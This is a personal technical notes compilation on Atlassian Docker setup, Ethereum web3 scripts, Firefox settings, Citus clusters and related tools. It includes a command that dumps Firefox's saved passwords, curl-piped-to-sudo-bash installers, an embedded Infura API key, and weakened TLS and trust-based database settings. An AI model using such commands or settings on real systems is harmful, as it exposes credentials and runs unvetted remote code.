
Omid Raha MyStack Documentation
Release 0.1

Omid Raha

Oct 28, 2019

Contents

1 Aircrack-ng
2 APPLE
3 Astronomy
4 Atlassian
5 benchmark
6 Block Chain
7 Browser
8 Ceph
9 Citus
10 CockRoachDB
11 Cothority
12 Crypto currency
13 CTF
14 Deploy
15 Dictionary
16 Django
17
18 ffmpeg
19 Game
20 Go-Lang
21
22 HAPROXY
23 HTTP
24 IP
25 InterPlanetary (IPFS)
26 IRC
27
28 Java Script
29 Latex
30
31 Machine Learning
32 Hg Mercurial
33 Metasploit
34 Mobile Programming
35 MongoDB
36 Nginx
37 Nmap
38 NodeJS
39 Notes
40
41 Piano
42 PostgreSQL
43 Python
44 RabbitMQ
45 Redmine
46 Research
47 Ruby
48 Security
49 Metasploit
50 Sphinx
51 Sport
52 Version Control System
53
54 Indices and tables


Hi! I’m Omid Raha. Here I am gathering notes from my experience on subjects I have worked on. Contents:


CHAPTER 1

Aircrack-ng

Contents:

1.1 Install

1.1.1 Install aircrack-ng 1.2-beta1 from source

http://www.aircrack-ng.org/doku.php?id=install_aircrack#installing_aircrack-ng_from_source
https://github.com/aircrack-ng/aircrack-ng

$ apt-get install build-essential
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz
$ tar -zxvf aircrack-ng-1.2-beta1.tar.gz
$ cd aircrack-ng-1.2-beta1
$ make sqlite=true unstable=true
$ make sqlite=true unstable=true install
$ airodump-ng-oui-update    # to install or update the Airodump-ng OUI file


CHAPTER 2

APPLE

Contents:

2.1 Tips

2.1.1 Apple ID

https://appleid.apple.com/#!&page=create
https://appleid.apple.com/account/manage/

2.1.2 Hackintosh

https://github.com/huangyz0918/Hackintosh-Installer-University
https://github.com/LER0ever/Hackintosh
http://x220.mcdonnelltech.com/
https://www.tonymacx86.com/threads/n552vw-asus-vivobook.225952/
https://www.tonymacx86.com/threads/guide-booting-the-os-x-installer-on-laptops-with-clover.148093/
https://www.tonymacx86.com/el-capitan-laptop-support/164990-faq-read-first-laptop-frequent-questions.html
https://www.tonymacx86.com/threads/faq-read-first-laptop-frequent-questions.164990/
https://www.tonymacx86.com/threads/unibeast-install-macos-high-sierra-on-any-supported--based-pc.235474/#download


CHAPTER 3

Astronomy

Rosetta spacecraft, Philae probe lands, M42, 67P/Churyumov-Gerasimenko

3.1 astronomical unit (AU, or au)

A unit of length effectively equal to the average, or mean, distance between Earth and the Sun, defined as 149,597,870.7 km

3.2 What Is the Distance Between Earth and Mars?

The minimum distance from the Earth to Mars is about 54.6 million kilometers. The farthest apart they can be is about 401 million km. The average distance is about 225 million km.
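Expressed in the astronomical unit defined above, those figures work out as follows (a quick Python sketch; the distances are the approximate values quoted in this section):

AU_KM = 149_597_870.7  # one astronomical unit in kilometres, as defined above

for label, km in (("minimum", 54.6e6), ("average", 225e6), ("maximum", 401e6)):
    print(f"Earth-Mars {label} distance: {km / AU_KM:.2f} AU")

# Earth-Mars minimum distance: 0.36 AU
# Earth-Mars average distance: 1.50 AU
# Earth-Mars maximum distance: 2.68 AU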

3.3 What is the Distance to the Moon?

The average distance to the Moon is 384,403 km

3.4 What Is the Distance Between Earth and the Sun?

149,600,000 km


3.5 Software

stellarium
celestia
Starry Night

3.6 Galaxy

Andromeda galaxy

CHAPTER 4

Atlassian

Contents:

4.1 Tips

4.1.1 Atlassian installation approach

Install Atlassian Jira and atlassian-confluence with docker images by cptactionhank:

https://github.com/cptactionhank
https://github.com/cptactionhank/docker-atlassian-jira
http://cptactionhank.github.io/docker-atlassian-jira/
https://hub.docker.com/r/cptactionhank/atlassian-jira/
https://github.com/cptactionhank/docker-atlassian-confluence
http://cptactionhank.github.io/docker-atlassian-confluence/

Install Atlassian Bitbucket Server with docker image by Atlassian:

https://bitbucket.org/atlassian/docker-atlassian-bitbucket-server/overview
https://hub.docker.com/r/atlassian/bitbucket-server/

Install Atlassian Bitbucket Server on the cloud with docker images by Atlassian:

https://developer.atlassian.com/blog/2015/12/atlassian-docker-orchestration/

Videos:

http://www.youtube.com/watch?v=mqVMoUjmkP0
http://www.youtube.com/watch?v=zhAT-gZcpBM

Other links:

https://bitbucket.org/atlassian/bamboo-docker-plugin

4.1.2 Atlassian license Prices

Bitbucket Server

https://www.atlassian.com/software/bitbucket/pricing?tab=host-on-your-server
https://www.atlassian.com/licensing/bitbucket-server/

Confluence

https://www.atlassian.com/software/confluence/pricing?tab=host-on-your-server
https://www.atlassian.com/licensing/confluence/

JIRA

https://www.atlassian.com/software/jira/pricing?tab=host-on-your-server#tab-9eb6ae11
https://es.atlassian.com/licensing/jira-software

HipChat

https://www.hipchat.com/pricing
https://www.hipchat.com/server#pricing-show
https://www.atlassian.com/purchase/product/com.atlassian.hipchat.server
https://blog.hipchat.com/2014/05/27/hipchat-is-now-free-for-unlimited-users/

Others:

https://confluence.atlassian.com/display/CLOUDKB/Pros+and+Cons+of+Cloud+vs.+Server
https://confluence.atlassian.com/bitbucket/associate-an-existing-domain-with-an-account-221449746.html
https://jira.atlassian.com/browse/CLOUD-6999?src=confmacro

For a local server, payment is a one-time charge and includes 12 months of software maintenance (support and updates).

Product           Users (up to)   Your Own Server (one-time payment)   Atlassian Cloud server (per month)
----------------  --------------  ------------------------------------ -----------------------------------
Bitbucket Server  5               x                                    Free
                  10              10$                                  10$
                  25              1,800$                               25$
                  50              3,300$                               50$
JIRA              10              10$                                  10$
                  15              x                                    75$
                  25              1,800$                               150$
                  50              3,300$                               300$
Confluence        10              10$                                  10$
                  15              x                                    50$
                  25              1,200$                               100$
                  50              2,200$                               200$
HipChat Basic                     x                                    Free
HipChat Plus                      x                                    2$ (per user/month)
                  10              10$/year                             x
                  25              1,800$/year                          x
                  50              3,300/year                           x

HipChat Basic: Group chat, Instant messaging, File sharing, Unlimited users and integrations.
HipChat Plus: Video chat, Screensharing, File sharing, Unlimited users and integrations, Much more.

Sample Own Server prices:

2GB / 2 Core: 20$/month
4GB / 2 Core: 40$/month

4.1.3 Run Jira with docker

$ docker pull cptactionhank/atlassian-jira:latest

$ docker run -p 80:8080 -v /home/rsa/workspace/docker/atlassian/jira:/var/atlassian/jira --env "CATALINA_OPTS=-Xms64m -Xmx768m -Datlassian.plugins.enable.wait=300" cptactionhank/atlassian-jira:latest

$ docker create --restart=no --name "jira-container" -p 80:8080 -v /home/or/workspace/docker/atlassian/jira:/var/atlassian/jira --env "CATALINA_OPTS=-Xms64m -Xmx768m -Datlassian.plugins.enable.wait=300" cptactionhank/atlassian-jira:latest
$ docker start --attach "jira-container"

Data Directories: /var/atlassian/jira
Expose Ports: 8080

https://hub.docker.com/r/cptactionhank/atlassian-jira/
https://github.com/cptactionhank/docker-atlassian-jira
http://cptactionhank.github.io/docker-atlassian-jira/
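The same container can also be started from Python with the Docker SDK (a rough sketch, assuming the docker Python package is installed and the host path above exists; it mirrors the docker create command above, not an official recipe):

# Sketch: start the Jira image with the same ports, volume and JVM options
# as the docker commands above (the host path is the example path used there).
import docker

client = docker.from_env()
container = client.containers.run(
    "cptactionhank/atlassian-jira:latest",
    name="jira-container",
    ports={"8080/tcp": 80},  # publish container port 8080 on host port 80
    volumes={"/home/or/workspace/docker/atlassian/jira": {"bind": "/var/atlassian/jira", "mode": "rw"}},
    environment={"CATALINA_OPTS": "-Xms64m -Xmx768m -Datlassian.plugins.enable.wait=300"},
    detach=True,
)
print(container.name, container.status)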

4.1.4 Run Confluence with docker

$ docker pull cptactionhank/atlassian-confluence:latest

$ docker run -p 80:8090 -v /home/or/workspace/docker/atlassian/confluence:/var/atlassian/confluence --env "CATALINA_OPTS=-Xms64m -Xmx768m -Datlassian.plugins.enable.wait=300" cptactionhank/atlassian-confluence:latest

Data Directories: /var/atlassian/confluence
Expose Ports: 8090

https://hub.docker.com/r/cptactionhank/atlassian-confluence/
https://github.com/cptactionhank/docker-atlassian-confluence
http://cptactionhank.github.io/docker-atlassian-confluence/

4.1.5 Run Bitbucket Server with docker

$ docker pull atlassian/bitbucket-server
$ docker run -v /home/or/workspace/docker/atlassian/bitbucket:/var/atlassian/application-data/bitbucket -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server

Expose Ports: 7990 7999
Data Directories: /var/atlassian/application-data/bitbucket

https://hub.docker.com/r/atlassian/bitbucket-server/

4.1.6 JIRA is Unable to Start due to Could not create necessary subdirectory

# on host system
$ mkdir <data directory on host>
$ mkdir /home/or/workspace/docker/atlassian/jira/
$ sudo chown -R <user>:<group> <data directory on host>
$ sudo chown -R :daemon /home/or/workspace/docker/

https://confluence.atlassian.com/display/JIRAKB/JIRA+is+Unable+to+Start+due+to+Could+not+create+necessary+subdirectory
https://github.com/docker/docker/issues/2259


4.1.7 Atlassian Docker compose file

jira:
  image: cptactionhank/atlassian-jira:7.0.5
  restart: always
  links:
    - database
  volumes:
    - ~/workspace/docker/atlassian/jira:/var/atlassian/jira

confluence:
  image: cptactionhank/atlassian-confluence:5.9.4
  restart: always
  links:
    - database
  volumes:
    - ~/workspace/docker/atlassian/confluence:/var/atlassian/confluence

bitbucket:
  image: atlassian/bitbucket-server:4.3
  restart: always
  links:
    - database
  volumes:
    - ~/workspace/docker/atlassian/bitbucket:/var/atlassian/application-data/bitbucket

database:
  image: postgres:9.4
  restart: always
  volumes:
    - ~/workspace/docker/postgres:/var/lib/postgresql/data

nginx:
  image: nginx
  restart: always
  ports:
    - "80:80"
  links:
    - jira
    - confluence
    - bitbucket
  volumes:
    - ./config/nginx/nginx.conf:/etc/nginx/nginx.conf:ro

The nginx.conf file:

user nginx;
worker_processes 1;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    #tcp_nopush on;

    keepalive_timeout 65;

    #gzip on;

    include /etc/nginx/conf.d/*.conf;

    proxy_connect_timeout 600;
    proxy_send_timeout 600;
    proxy_read_timeout 600;
    send_timeout 600;
    client_max_body_size 0;

    server {
        listen 80;
        server_name jira.example.com www.jira.example.com;

        location / {
            proxy_pass http://jira:8080;

            proxy_set_header X-Forwarded-Host $host;
            proxy_set_header X-Forwarded-Server $host;
            proxy_set_header X-Forwarded-For $remote_addr;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header Host $host;
        }
    }

    server {
        listen 80;
        server_name wiki.example.com www.wiki.example.com;

        location / {
            proxy_pass http://confluence:8090;

            proxy_set_header X-Forwarded-Host $host;
            proxy_set_header X-Forwarded-Server $host;
            proxy_set_header X-Forwarded-For $remote_addr;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header Host $host;
        }
    }

    server {
        listen 80;
        server_name bitbucket.example.com www.bitbucket.example.com;

        location / {
            proxy_pass http://bitbucket:7990;

            proxy_set_header X-Forwarded-Host $host;
            proxy_set_header X-Forwarded-Server $host;
            proxy_set_header X-Forwarded-For $remote_addr;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header Host $host;
        }
    }
}

$ mkdir -p ~/workspace/docker/atlassian/jira
$ mkdir -p ~/workspace/docker/atlassian/confluence
$ mkdir -p ~/workspace/docker/atlassian/bitbucket
$ mkdir -p ~/workspace/docker/postgres
$ mkdir -p ~/workspace/docker/nginx

$ sudo chown -R daemon:daemon ~/workspace/docker/atlassian

$ docker-compose ps

$ docker exec -it atlassian_jira_1 bash

$ docker-compose.yaml
$ docker-compose up

https://confluence.atlassian.com/display/BitbucketServerKB/Git+push+fails+-+client+intended+to+send+too+large+chunked+body

4.1.8 Backup atlassian product

Automating JIRA Backups

The XML backup includes all data in the database. However, it does not include your attachments directory, JIRA Home Directory or JIRA Installation Directory, which are stored on the filesystem. You can also perform XML backups manually. See Backing Up Data for details. Be aware that after installing JIRA and running the setup wizard, a backup service will automatically be configured to run every 12 hours.

For production use or large JIRA installations, it is strongly recommended that you use native database-specific tools instead of the XML backup service. XML backups are not guaranteed to be consistent, as the database may be updated during the backup process. Inconsistent backups are created successfully without any warnings or error messages, but fail during the restore process. Database-native tools offer a much more consistent and reliable means of storing data.

https://confluence.atlassian.com/jira/automating-jira-backups-185729637.html

Backing Up Data


This page describes how to back up your JIRA data, and establish processes for maintaining continual backups. Backing up your JIRA data is the first step in upgrading your server to a new JIRA revision, or splitting your JIRA instance across multiple servers. See also Restoring JIRA data and Restoring a Project from Backup.

Creating a complete backup of JIRA consists of two stages:

1. Backing up database contents
   - Using native database backup tools
   - Using JIRA's XML backup utility
2. Backing up the data directory

https://confluence.atlassian.com/jira/backing-up-data-185729581.html#BackingUpData-Usingnativedatabasebackuptools

Postgres File System Level Backup
http://www.postgresql.org/docs/9.3/static/backup-file.html

Using Rsync and SSH
http://troy.jdmz.net/rsync/index.html
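A scripted version of the two stages above might look like this (a sketch only; pg_dump must be on the PATH, and the database name and home-directory path are placeholders to adjust for your installation):

# Sketch: native database dump plus an archive of the JIRA home directory.
# The database name, user and home path below are placeholders, not values
# taken from this document.
import subprocess
import tarfile
from datetime import datetime

stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
jira_home = "/var/atlassian/jira"   # placeholder home directory
db_name = "jiradb"                  # placeholder database name

# Stage 1: back up the database contents with a native tool (pg_dump).
subprocess.run(["pg_dump", "-U", "postgres", "-f", f"jira-db-{stamp}.sql", db_name], check=True)

# Stage 2: back up the data directory (attachments live here, not in XML backups).
with tarfile.open(f"jira-home-{stamp}.tar.gz", "w:gz") as tar:
    tar.add(jira_home, arcname="jira-home")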

4.1.9 Bamboo

https://confluence.atlassian.com/bamboo/getting-started-with-docker-and-bamboo-687213473.html
http://blogs.atlassian.com/2015/09/bamboo-docker-building-web-apps/?utm_source=twitter&utm_medium=social&utm_campaign=atlassian_bamboo-docker-addteq
http://www.systemsthoughts.com/2015/5-things-i-learned-using-docker-for-bamboo/
https://realpython.com/blog/python/django-development-with-docker-compose-and-machine/
https://pometeam.atlassian.net/builds/build/admin/ajax/viewAvailableVariables.action?planKey=POG-TEST-JOB1
http://stackoverflow.com/questions/1419629/atlassian-bamboo-with-django-python-possible
https://jira.atlassian.com/browse/BAM-11368
https://answers.atlassian.com/questions/35809/how-to-parse-django-tests-with-bamboo
http://mike-clarke.com/2013/11/docker-links-and-runtime-env-vars/
http://stackoverflow.com/questions/31746182/docker-compose-wait-for-container-x-before-starting-y
https://github.com/docker/compose/issues/374
http://stackoverflow.com/questions/29377853/how-to-use-environment-variables-in-docker-compose
https://confluence.atlassian.com/bamboocloud/bamboo-variables-737184363.html

echo ${bamboo.agentWorkingDirectory}
echo ${bamboo.build.working.directory}

https://pometeam.atlassian.net/builds/admin/agent/addRemoteAgent.action

nohup java -jar atlassian-bamboo-agent-installer-5.10-OD-13-001.jar https://pometeam.atlassian.net/builds/agentServer/ -t > /dev/null 2>&1 &

CHAPTER 5

benchmark

Contents:

5.1 Tips

5.1.1 Using Apache Bench for Simple Load Testing

$ ab -n 1000 -c 10 http://localhost/

http://stackoverflow.com/questions/12732182/ab-load-testing
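If ab is not available, the same idea (1000 requests, 10 at a time) can be approximated with a small Python script using only the standard library (the URL is just the local example above):

# Rough equivalent of "ab -n 1000 -c 10": 1000 GET requests, 10 in flight at a time.
import time
from concurrent.futures import ThreadPoolExecutor
from urllib.request import urlopen

URL = "http://localhost/"

def fetch(_):
    with urlopen(URL) as response:
        return response.status

start = time.time()
with ThreadPoolExecutor(max_workers=10) as pool:
    statuses = list(pool.map(fetch, range(1000)))
print(len(statuses), "requests in", round(time.time() - start, 2), "seconds")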


CHAPTER 6

Block Chain

Contents:

6.1 Tips

6.2 Ethereum

https://www.infura.io/register

from eth_account.messages import defunct_hash_message
from solc import compile_source
from web3 import Web3
from web3.providers.rpc import HTTPProvider

endpoint_url = 'https://ropsten.infura.io/v3/549a3096fb7d410381ba844e3930cfc5'
web3 = Web3(HTTPProvider(endpoint_url))


# https://web3py.readthedocs.io/en/latest/web3.eth.account.html
def create_keys():
    account = web3.eth.account.create()
    return account.address, account.privateKey


def sign_message(text, private_key):
    message_hash = defunct_hash_message(text=text)
    signed_message = web3.eth.account.signHash(message_hash, private_key=private_key)
    return message_hash, signed_message


def verify_message(text, signed_message):
    message_hash = defunct_hash_message(text=text)
    recover = web3.eth.account.recoverHash(message_hash, signature=signed_message.signature)
    return recover


def verify_message_from_message_hash(message_hash, signature):
    recover = web3.eth.account.recoverHash(message_hash, signature=signature)
    return recover


# Solidity source code
contract_source_code = '''
pragma solidity ^0.4.21;

contract Greeter {
    string public greeting;

    function Greeter() public {
        greeting = 'Hello';
    }

    function setGreeting(string _greeting) public {
        greeting = _greeting;
    }

    function greet() view public returns (string) {
        return greeting;
    }
}
'''

address, pk = create_keys()
address = web3.toChecksumAddress(address)

compiled_sol = compile_source(contract_source_code)  # Compiled source code
contract_interface = compiled_sol[':Greeter']

print('web3.eth.blockNumber', web3.eth.blockNumber)

abi, bytecode = contract_interface['abi'], contract_interface['bin']
contract = web3.eth.contract(bytecode=bytecode, abi=abi)

print('address', address)

# sample valid address
to_address = web3.toChecksumAddress('0x7f508c2666a3b40598572d7232ec4fb95162fd9a')

transaction = {
    'to': to_address,
    'value': 1000000000000000000,
    'gas': 4700000,
    'gasPrice': web3.eth.gasPrice,
    'nonce': web3.eth.getTransactionCount(address)
}

tx = contract.buildTransaction(transaction).setGreeting('Omid')
signed = web3.eth.account.signTransaction(tx, pk)
final = web3.eth.sendRawTransaction(signed.rawTransaction)
print('final', final)
print('fin:', web3.toHex(final))

###############################

transaction = {
    'to': to_address,
    'value': 1000000000000000000,
    'gas': 4700000,
    'gasPrice': web3.eth.gasPrice,
    'nonce': web3.eth.getTransactionCount(address),
    'data': b'A' * 32655
}

signed = web3.eth.account.signTransaction(transaction, pk)
final = web3.eth.sendRawTransaction(signed.rawTransaction)
print('final', final)
print('fin:', web3.toHex(final))

###############################
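A minimal usage sketch for the signing helpers defined above; it only exercises create_keys, sign_message and verify_message locally, so no Ropsten access or funded account is needed:

# Usage sketch for the helpers above: sign a message with a fresh key and
# check that the address recovered from the signature matches the signer.
addr, private_key = create_keys()
message_hash, signed = sign_message('hello', private_key)
recovered = verify_message('hello', signed)
print(recovered == addr)  # expected: True
print(verify_message_from_message_hash(message_hash, signed.signature) == addr)  # expected: True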

6.2.1 Solidity

https://github.com/ethereum/py-solc

$ pip install py-solc
$ python -m solc.install v0.4.21
$ export PATH="~/.py-solc/solc-v0.4.21/bin/:$PATH"

6.2.2 Online solidity

https://remix.ethereum.org/#optimize=true&version=builtin
https://ethereum.github.io/browser-solidity/#optimize=false&version=soljson-v0.4.25-nightly.2018.9.10+commit.86d85025.js

6.2.3 Links

https://ropsten.etherscan.io/tx/
https://hackernoon.com/ethereum-smart-contracts-in-python-a-comprehensive-ish-guide-771b03990988
https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn?hl=en
https://ethereum.stackexchange.com/questions/11495/best-way-to-test-a-smart-contract

https://metamask.io/
https://faucet.metamask.io/
https://gist.github.com/Kcrong/1f832a2f4ab861da3d852c5b0a30ef47
http://justin.yackoski.name/winp/
https://web3py.readthedocs.io/en/stable/contracts.html#contract-deployment-example

CHAPTER 7

Browser

Contents:

7.1 Firefox

$ aptitude install nss-passwords
$ nss-passwords example.com
| http://example.com | USERNAME | PASSWORD |

7.1.1 Disable Dns Cache

Type in about:config in the address bar.
Right click on the list of properties and select New > Integer in the context menu.
Enter network.dnsCacheExpiration as the preference name and 0 as the integer value.

When disabled, Firefox will use the DNS cache provided by the OS.

http://en.kioskea.net/faq/555-disabling-the-dns-cache-in-mozilla-firefox

7.1.2 Increase download them all maximum segments

Type in about:config in the address bar, then open extensions.dta.maxchunks and change it to the number you want. After that, don't change it from the DownThemAll panel.


7.1.3 Set security tls

Go to about:config, and set:

security.tls.version.min 0
security.tls.version.max 0   # default is 3

7.1.4 Disable automatic loading of Images in Firefox

Go to about:config and search for the option "permissions.default.image"; to disable automatic image loading, change it to 2.

Possible values:

1 – always load the images
2 – never load the images
3 – don't load third-party images

7.1.5 Fix Firefox Phishing

The xn-- prefix is what is known as an 'ASCII compatible encoding' prefix. It lets the browser know that the domain uses 'punycode' encoding to represent Unicode characters. In non-techie speak, this means that if you have a domain name with Chinese or other international characters, you can register a domain name with normal A-Z characters that can allow a browser to represent that domain as international characters in the location bar.

What we have done above is used 'e' 'p' 'i' and 'c' unicode characters that look identical to the real characters but are different unicode characters. In the current version of Chrome, as long as all characters are unicode, it will show the domain in its internationalized form.

about:config
network.IDN_show_punycode = true

https://www.wordfence.com/blog/2017/04/chrome-firefox-unicode-phishing/
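Python's built-in idna codec shows the mapping between the Unicode form and the xn-- form (a small illustration; bücher.de is a stock IDN example, not one of the spoofed domains discussed above):

# Round-trip a Unicode domain through its ASCII-compatible (xn--) form.
unicode_domain = "bücher.de"
ascii_form = unicode_domain.encode("idna")
print(ascii_form)                  # b'xn--bcher-kva.de'
print(ascii_form.decode("idna"))   # bücher.de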

7.2 Opera

Add Opera source list

## Add this line for the Opera browser
## use "stable" instead of the distribution name
deb http://deb.opera.com/opera stable non-free

Now, we are going to trust the Opera archive key:

$ sudo su
$ wget -O - http://deb.opera.com/archive.key | apt-key add -

https://wiki.debian.org/Opera

CHAPTER 8

Ceph

The default CRUSH rule is set at the host level, not the OSD level. To change it to the OSD level, add this to the [global] section of the ceph.conf file:

osd crush chooseleaf type = 0

osd crush chooseleaf type
Description: The bucket type to use for chooseleaf in a CRUSH rule. Uses ordinal rank rather than name.
Type: 32-bit Integer
Default: 1. Typically a host containing one or more Ceph OSD Daemons.

Status of the PGs: STUCK UNCLEAN, ACTIVE+CLEAN

ceph -s
ceph osd tree


CHAPTER 9

Citus

Contents:

9.1 Tips

9.1.1 Install citus on single machine with docker

# Download docker-compose file
$ curl -L https://raw.githubusercontent.com/citusdata/docker/master/docker-compose.yml > docker-compose.yml

# Run docker-compose file
$ COMPOSE_PROJECT_NAME=citus docker-compose up -d

citus_manager    python -u ./manager.py          Up
citus_master     docker-entrypoint.sh postgres   Up   0.0.0.0:5432->5432/tcp
citus_worker_1   docker-entrypoint.sh postgres   Up   5432/tcp

# Verify installation
$ docker exec -it citus_master psql -U postgres

postgres=# SELECT * FROM master_get_active_worker_nodes();

   node_name    | node_port
----------------+-----------
 citus_worker_1 |      5432
(1 row)

# Shutdown
$ COMPOSE_PROJECT_NAME=citus docker-compose down -v

https://docs.citusdata.com/en/v8.1/installation/single_machine_docker.html
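Once the containers are up, the coordinator can also be queried from Python (a sketch assuming the psycopg2 package and the compose file's defaults of user postgres on localhost:5432 with no password; adjust if your setup differs):

# Sketch: list the active Citus worker nodes from Python.
import psycopg2

conn = psycopg2.connect(host="localhost", port=5432, user="postgres", dbname="postgres")
with conn, conn.cursor() as cur:
    cur.execute("SELECT * FROM master_get_active_worker_nodes();")
    for node_name, node_port in cur.fetchall():
        print(node_name, node_port)
conn.close()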


9.1.2 Install citus on a single machine on ubuntu

# Add Citus repository for package manager
$ curl https://install.citusdata.com/community/deb.sh | sudo bash

# install the server and initialize db
$ sudo apt-get -y install postgresql-11-citus-8.1

# this user has access to sockets in /var/run/postgresql
$ sudo su - postgres

# include path to postgres binaries
$ export PATH=$PATH:/usr/lib/postgresql/11/bin

$ cd ~
$ mkdir -p citus/coordinator citus/worker1 citus/worker2

# create three normal postgres instances
$ initdb -D citus/coordinator
$ initdb -D citus/worker1
$ initdb -D citus/worker2

# Add citus extension to postgres config file
$ echo "shared_preload_libraries = 'citus'" >> citus/coordinator/postgresql.conf
$ echo "shared_preload_libraries = 'citus'" >> citus/worker1/postgresql.conf
$ echo "shared_preload_libraries = 'citus'" >> citus/worker2/postgresql.conf

# Start db
$ pg_ctl -D citus/coordinator -o "-p 9700" -l coordinator_logfile start
$ pg_ctl -D citus/worker1 -o "-p 9701" -l worker1_logfile start
$ pg_ctl -D citus/worker2 -o "-p 9702" -l worker2_logfile start

# Add citus extension
$ psql -p 9700 -c "CREATE EXTENSION citus;"
$ psql -p 9701 -c "CREATE EXTENSION citus;"
$ psql -p 9702 -c "CREATE EXTENSION citus;"

# Register workers on coordinator
$ psql -p 9700 -c "SELECT * from master_add_node('localhost', 9701);"
$ psql -p 9700 -c "SELECT * from master_add_node('localhost', 9702);"

# Verify installation
$ psql -p 9700 -c "select * from master_get_active_worker_nodes();"

 node_name | node_port
-----------+-----------
 localhost |      9701
 localhost |      9702
(2 rows)

$ psql -p 9700 -c "SELECT * from pg_dist_node;"

 nodeid | groupid | nodename  | nodeport | noderack | hasmetadata | isactive | noderole | nodecluster
--------+---------+-----------+----------+----------+-------------+----------+----------+-------------
      1 |       1 | localhost |     9701 | default  | f           | t        | primary  | default
      2 |       2 | localhost |     9702 | default  | f           | t        | primary  | default
(2 rows)

# stop db
$ pg_ctl -D citus/worker2 stop
$ pg_ctl -D citus/worker1 stop
$ pg_ctl -D citus/coordinator stop

https://docs.citusdata.com/en/v8.1/installation/single_machine_debian.html
http://docs.citusdata.com/en/v8.0/develop/api_udf.html#master-add-node
http://docs.citusdata.com/en/v8.0/develop/api_udf.html#master-get-active-worker-nodes

9.1.3 Install citus on multi-machine cluster on Ubuntu

For both coordinator and workers:

# Add Citus repository for package manager
$ curl https://install.citusdata.com/community/deb.sh | sudo bash

# install the server and initialize db
$ sudo apt-get -y install postgresql-11-citus-8.1

# preload citus extension
$ sudo pg_conftool 11 main set shared_preload_libraries citus

$ sudo pg_conftool 11 main set listen_addresses '*'

$ sudo vi /etc/postgresql/11/main/pg_hba.conf

# Allow unrestricted access to nodes in the local network. The following ranges
# correspond to 24, 20, and 16-bit blocks in Private IPv4 address spaces.
host    all    all    10.0.0.0/8      trust

# Also allow the host unrestricted access to connect to itself
host    all    all    127.0.0.1/32    trust
host    all    all    ::1/128         trust

# start the db server
$ sudo service postgresql restart
# and make it start automatically when computer does
$ sudo update-rc.d postgresql enable

# add the citus extension
$ sudo -i -u postgres psql -c "CREATE EXTENSION citus;"

Only on coordinator:

# Add workers to dns
$ sudo vim /etc/hosts

192.168.0.131 w1
192.168.0.132 w2

# Register workers on coordinator
$ sudo -i -u postgres psql -c "SELECT * from master_add_node('w1', 5432);"
$ sudo -i -u postgres psql -c "SELECT * from master_add_node('w2', 5432);"

# Verify installation
$ sudo -i -u postgres psql -c "SELECT * FROM master_get_active_worker_nodes();"

 node_name | node_port
-----------+-----------
 w1        |      5432
 w2        |      5432
(2 rows)

# Ready to use
$ sudo -i -u postgres psql

https://docs.citusdata.com/en/v8.1/installation/multi_machine_debian.html

9.1.4 Have a unique constraint on one field of table

https://docs.citusdata.com/en/v8.1/faq/faq.html#can-i-create-primary-keys-on-distributed-tables https://stackoverflow.com/a/43660911
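A minimal sketch of the usual pattern from those links: the primary key (or any unique constraint) has to include the distribution column. The table and column names below are made up for illustration:

$ psql -p 9700 -c "CREATE TABLE events (tenant_id int, event_id bigint, payload jsonb, PRIMARY KEY (tenant_id, event_id));"
$ psql -p 9700 -c "SELECT create_distributed_table('events', 'tenant_id');"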

9.1.5 Limitation of Citus Community

Rebalance, Replicate, Isolate

These three important functions are not available:

• rebalance_table_shards
• replicate_table_shards
• isolate_tenant_to_new_shard

When you add and register a new node, you cannot rebalance the existing data onto this new empty node, and tenant isolation is not available.

https://github.com/citusdata/citus/issues/828
https://docs.citusdata.com/en/v8.1/admin_guide/cluster_management.html#tenant-isolation

Adding a coordinator

Users can send their queries to any coordinator and scale out performance. If your setup requires you to use multiple coordinators, please contact us. https://docs.citusdata.com/en/v8.1/admin_guide/cluster_management.html#adding-a-coordinator


Worker Node Failures

Citus supports two modes of replication:

1. PostgreSQL streaming replication.
2. Citus shard replication.

Only the second one is available; it is suited for an append-only workload, and the setting needs to be done before distributing data to the cluster.
https://docs.citusdata.com/en/v8.1/admin_guide/cluster_management.html#worker-node-failures
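A small sketch of applying the shard replication setting before distributing a table (the table name and factor of 2 are illustrative, not taken from the docs):

$ psql -p 9700
postgres=# SET citus.shard_replication_factor = 2;  -- must be in effect before distributing the table
postgres=# CREATE TABLE events (tenant_id int, event_id bigint, payload jsonb);
postgres=# SELECT create_distributed_table('events', 'tenant_id');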

9.1.6 Django

https://docs.citusdata.com/en/v8.1/develop/migration_mt_django.html#django-migration
https://github.com/omidraha/citus-exp


CHAPTER 10

CockRoachDB

Contents:

10.1 Tips

10.1.1 NewSql

https://en.wikipedia.org/wiki/NewSQL

10.1.2 Support SQL and Postgres

https://www.cockroachlabs.com/docs/stable/sql-feature-support.html
https://www.cockroachlabs.com/docs/v2.1/cockroachdb-in-comparison.html
https://www.cockroachlabs.com/blog/why-postgres/
https://www.cockroachlabs.com/docs/v2.1/migrate-from-postgres.html

Performance best practice
https://www.cockroachlabs.com/docs/stable/performance-best-practices-overview.html

Join
https://www.cockroachlabs.com/docs/stable/joins.html
https://www.cockroachlabs.com/docs/stable/joins.html#performance-best-practices

10.1.3 Support Django

https://github.com/cockroachdb/cockroachdb-python/pull/14


10.1.4 Support k8s

https://www.cockroachlabs.com/docs/v2.1/orchestrate-cockroachdb-with-kubernetes-multi-cluster.html

10.1.5 Scale

https://www.cockroachlabs.com/docs/stable/frequently-asked-questions.html#how-does-cockroachdb-scale
https://www.cockroachlabs.com/docs/stable/multi-active-availability.html
https://www.cockroachlabs.com/docs/stable/high-availability.html

10.1.6 Performance

https://www.cockroachlabs.com/blog/cockroachdb-2dot1-performance/

10.1.7 Deploy multi-node cluster using HAProxy load balancer

Deploy a secure multi-node CockroachDB cluster on multiple machines, using HAProxy load balancers to distribute client traffic. https://www.cockroachlabs.com/docs/stable/deploy-cockroachdb-on-premises.html
